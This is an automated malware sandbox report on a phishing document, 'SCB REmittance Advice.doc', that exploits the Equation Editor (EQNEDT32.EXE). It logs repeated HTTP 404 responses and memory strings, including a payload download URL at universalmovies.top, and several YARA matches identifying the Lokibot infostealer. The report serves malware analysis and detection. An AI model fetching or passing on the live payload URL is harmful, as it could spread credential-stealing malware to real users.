Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mh3Wy2WqvWAUs8KxgOxTtghleeEGlfHUHiBzGw52VEh6j76j0%2B6dH%2BC%2FUELUGy5raJTL00FfP56DLjum16hFm8yr5co8VsNZLetFGhV4KL77pvozlUob494Hy2JSkN05pK6O"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d3c9cc9187d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMU1p337cSbx5Y6Gpjl8wMHUs%2FSBO5Laf1mrGFhKHbnBACpGeNgHF4p36cpcyYkZVpBAj66jyyrb6Wica1kY9TqE2%2F7q0wmFJxuMbyvrbipcbWGQ1%2BEyG9cLN4RKx5aXld7M"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d426d8cc3f0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Syj7tAuEIMCZqN2tRh11O3Qor8fEhbM%2BWRLcGRGnIRVGT%2Bv0yoKw%2Fxj8MOEvjT26tWQB21LO6eUIW5QTLuvRdNJufGAE0QgdZYkk%2FbewBBjKYCuYq1eUfWYTAMVxkjx3hBeT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d483a1e18ae-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpeDZrdwwPO2t5wEyH%2FoZoQYiLedwPvBwIOGgHDPqmSi%2FO%2B5f3uwH5PvEW6iepqHVde6CiC8gJWQXDR%2BtAXF6AWadttYmzYhIsYZnjzP7%2B70g3w9%2FcV6k%2F2%2Fp8vYgzBIDawA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d4d6d7b43cb-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejbrLZuj22CSU29KvxHGoP3%2BIH5mxtwOqh1ESVHkCIZmNpWcMxxa3TgvU%2FWq6OnjuGQqUzMxrH8ctJ5mK1bPvYDwlLekioEqhRp%2BitIzbKttCoyPVgjqtqL%2FovBkRsfVD3sH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d547f0c8c2a-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRvjDfNJQ2cJf%2BT3f7P2r54lo3pPH52Sb%2FDuJ5xNz1f4iGHhoIVKcZ0R6i2xXIGhSq96IFGo4OWtUNRyy%2FwRc1E%2BJbe9ed0ZxjezMrFYrzRU4oXoOEYco%2B1QCt1D5gdjCplS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d5a0be018b4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1fwyNVCBKJZ8KPcbWAVb3BOUyg7TiHG5aV6%2F80S3fWEl4iXn6%2F4T3k%2Fvp7zywd9bEdIrUrndsqb2MaSrLZ6T5XIhwRMctkj2UqzDk54qZHXD39zRSxKykeSGmUk%2FHrnPX2f%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d5fed4917b5-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=02EWFTEVOVtWq0%2BgDUUMiV5Y1CdUN2v9OyKswqt957nxH%2FY02ewrJhb5sa5PR%2BQ0jlrgluETV%2B9BkRjKZyFPhcEImqcyqcu6amCR21waLTfLqXJTvXfQhkbG4RKWN8dIXqsT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d65bc4b7cf0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pblhBvhklB6b3N3x%2Bs3gf35fzVl2V1YgjxD318mrhyOlBf55l%2Fpj%2FxHCd3mDuZKenXm03EeZhQIMkotOjiVjY%2FKvDNRKhpaMdXmjP5sPb2nZ4NhzUu%2FC6ItME2vG6kAjgCwk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d6b7981187d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkp7pT%2BacVPDlxbyDnc8SLigsJJV594c4bPNxwwTiAFccsngfJBdYYj1lZ9J%2F6XP1u%2BOG68axa7YRQy2d%2BDq%2Fe8mMZnuTF7nlde9fQw%2BuG9X4dPslkNDFJ4ON0DZGpQ%2F%2F4yz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d712c360cac-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4PDKzJMaa126SILTl9o053%2F1HYer3OQOJvXJB4DL67uxL3Pa%2Bl0tP0%2FdLdQ8%2FNvCWFQQA6hbeVozD%2BL1YzHzEdxeQT%2B9cIhLOOzwtVyLMuJoDtNvNIgBT7rsscPATB6KtvA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d76f9c64308-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GoTdgv9bDZbRWbGXDhVOa8gx6C1AwiFCghPTgmK3bLS58natdXAf4Pn2jX8HnthQQpdpr8fHCEnYNj8KzhotK7VgQJY7qRQFOJXVr2EmT8uR8NvGdWXtOEVcFcBkS4HZTww"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d7dca204204-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhQLDiajpEIC9KtX%2F6HoVEYZTscS4kigoebrkrwjgPDuVwd5IrkLMyC%2B27Q7sFGJWDwIqOP7eintlnBUTvw12P%2Fzt0LL7fFhoaIadID6aoxzpsre9OFHkCTTHnSZ2QA76iom"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d82db9f0f36-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VKNJmiDleFRWiJoza%2FFCTw4zc29t8azsk4PWe23kgI%2FwR6AFjYNTaMv9MQddllIKuUkJ7ltUjc%2FXV2Z4Nn0YLi5lrXFvvfm%2Bvvgko2kNV3gPlJcrVgxuQGeEfTWeVjHXtgNw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d8879d772a1-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSWxdqYs4qQ2zDwUAPEX6RazmvRs%2BDt1Xo%2FC3%2F1iC3QidnS4xfMAqb%2FG4PiXOC2BIa%2Bg5gjfn%2FCxpJvR1KkvNXFqoHCTuhk6hf3uMPTXR0XIHmIgUe0tww3UJNzojNrFtqU1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d8e7f1d8c1e-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xce5oZfMpJRGsmJNSnq6%2B4TxB2N0J3wvjE9muGZwpfbM3EL9pNCBN1CfG5M9ubqlOTYkuK%2Bhw3e4jUen%2F%2FhbtfaiX6U%2FjJ5bS9p0hInJzIhX8p%2FFwNmPea2KuqqPjU1Ms8WV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d934f7fc46d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDWKhb4y48HkO2eV477ic%2BPQ3TNoEdUAz%2FeyPDwYK9FFbqRb3o9wOfxBH587hBJpOswpKBZdrzXL%2FozFoAZfR8Vglx5X9xMNCnlmR6p8G4pUbd6Ed%2ByMdIxc2i%2FiGnYmwtnd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d98dcbd43c2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4A3w6EhOrGlHxkDf1fljwTAe9K1CA6Fj14fuL8t1bO4BuQ4CqRk1MbUBzYhjyJYaw6eEnMcfEiorIYXkSdNGwrl5UYfAmJ846yTzapNXLfC0VvoDW1cNkB%2FGI16Ell0Cxdd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870d9ebf350f7d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfH%2F2BVpjSen2eyktv1BYCPUDFXtQxn3KpP4F9EwmF%2FpGNJP2lvbmrqIFTdvNpzHn%2FBGQTrQ%2B0xCYfbEmd%2BFuH1ZDtC6xk%2Ba1bxlgSfloXz3%2BWCmJCVyI5dcMleVAFZYoG19"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870da3a9d48c75-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFhwP2H%2BOS5aCEOLuYOThMMa498qI5eWf%2F2BIAL1yiv305Hw2OBPHrpxDwvW4BkBMFGYJ5FrrQU3pkrBQ%2FGu75qS0HnDCSqOaLgZlfCr5YxGUkSfVMA9mYI%2Fqq%2BFaN7NnmOR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870da92fb77288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:19:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1k06TqmMpfmAdQ55cmQPUDY0UHc8UvEa%2FqwjX4bImXFfZsrXLkcVsGptiCFg5xqG128v6YYH%2F7IUm5HHJiX3MDbv8QxFpcWAHiFmQEh%2BJlGNSxMcEZKxTaDeGCXTbK982PN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88870dadfe3641ed-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: sharon38892.exe, 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, XxENUzWteJXT.exe, 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr String found in binary or memory: http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: XxENUzWteJXT.exe, XxENUzWteJXT.exe, 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.348345473.000000000061F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://universalmovies.top/
Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://universalmovies.top/sharonzx.exe
Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://universalmovies.top/sharonzx.exej
Source: EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://universalmovies.top/sharonzx.exemmC:
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://universalmovies.top/sharonzx.exeoC:
Source: EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

barindex
Source: SCB REmittance Advice.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
